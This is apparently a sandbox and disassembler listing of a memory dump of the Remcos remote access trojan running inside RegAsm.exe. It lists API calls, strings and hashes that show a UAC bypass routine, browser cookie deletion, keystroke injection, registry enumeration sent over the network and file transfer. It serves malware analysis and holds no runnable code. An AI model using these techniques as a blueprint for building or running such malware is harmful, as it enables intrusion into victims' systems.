                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID: Remcos
                                  • API String ID: 1970332568-165870891
                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                  • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                  • __freea.LIBCMT ref: 00454083
                                  • __freea.LIBCMT ref: 0045408F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                  • String ID:
                                  • API String ID: 3256262068-0
                                  • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                  • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                  • _free.LIBCMT ref: 00445515
                                  • _free.LIBCMT ref: 0044552E
                                  • _free.LIBCMT ref: 00445560
                                  • _free.LIBCMT ref: 00445569
                                  • _free.LIBCMT ref: 00445575
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: _free$ErrorLast$_abort_memcmp
                                  • String ID: C
                                  • API String ID: 1679612858-1037565863
                                  • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                  • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tcp$udp
                                  • API String ID: 0-3725065008
                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                  • ExitThread.KERNEL32 ref: 004018F6
                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                  • String ID: PkG$XMG$NG$NG
                                  • API String ID: 1649129571-3151166067
                                  • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                  • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                  • String ID: .part
                                  • API String ID: 1303771098-3499674018
                                  • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                  • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                  APIs
                                  • SendInput.USER32 ref: 00419A25
                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InputSend$Virtual
                                  • String ID:
                                  • API String ID: 1167301434-0
                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16_free
                                  • String ID: a/p$am/pm$h{D
                                  • API String ID: 2936374016-2303565833
                                  • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                  • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                  APIs
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • _free.LIBCMT ref: 00444E87
                                  • _free.LIBCMT ref: 00444E9E
                                  • _free.LIBCMT ref: 00444EBD
                                  • _free.LIBCMT ref: 00444ED8
                                  • _free.LIBCMT ref: 00444EEF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: _free$AllocHeap
                                  • String ID: KED
                                  • API String ID: 1835388192-2133951994
                                  • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                  • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                  APIs
                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Enum$InfoQueryValue
                                  • String ID: [regsplt]$xUG$TG
                                  • API String ID: 3554306468-1165877943
                                  • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                  • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CloseEnumInfoOpenQuerysend
                                  • String ID: xUG$NG$NG$TG
                                  • API String ID: 3114080316-2811732169
                                  • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                  • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                  • __freea.LIBCMT ref: 0045129D
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                  • String ID: PkGNG
                                  • API String ID: 1857427562-263838557
                                  • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                  • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                  APIs
                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                  • _wcslen.LIBCMT ref: 0041B7F4
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                  • API String ID: 37874593-122982132
                                  • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                  • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                  APIs
                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 1133728706-4073444585
                                  • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                  APIs
                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                  • _free.LIBCMT ref: 00450FC8
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00450FD3
                                  • _free.LIBCMT ref: 00450FDE
                                  • _free.LIBCMT ref: 00451032
                                  • _free.LIBCMT ref: 0045103D
                                  • _free.LIBCMT ref: 00451048
                                  • _free.LIBCMT ref: 00451053
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                  • int.LIBCPMT ref: 004111BE
                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                  • String ID: (mG
                                  • API String ID: 2536120697-4059303827
                                  • Opcode ID: 4fb09889b2dc78d6b9bc341806ed1c893def47308d87ec9f5bd5aa626124b671
                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                  APIs
                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue
                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1866151309-2070987746
                                  • Opcode ID: 45c7c547461d0a90286b768378f5d74aead19740937584a5a1a9110f100f8656
                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                  • CoUninitialize.OLE32 ref: 00407664
                                  Similarity
                                  • API ID: InitializeObjectUninitialize_wcslen
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                  • API String ID: 3851391207-1839356972
                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                  • GetLastError.KERNEL32 ref: 0040BB22
                                  Strings
                                  • UserProfile, xrefs: 0040BAE8
                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 2018770650-304995407
                                  • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                  APIs
                                  • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                  Similarity
                                  • API ID: Console$AllocOutputShowWindow
                                  • String ID: Remcos v$5.1.2 Pro$CONOUT$
                                  • API String ID: 2425139147-1584637518
                                  • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                  • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                  • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                  • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$PkGNG$mscoree.dll
                                  • API String ID: 4061214504-213444651
                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                  APIs
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                  Similarity
                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                  • String ID: Alarm triggered$`#v
                                  • API String ID: 614609389-3049340936
                                  • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                  APIs
                                  • __allrem.LIBCMT ref: 0043ACE9
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
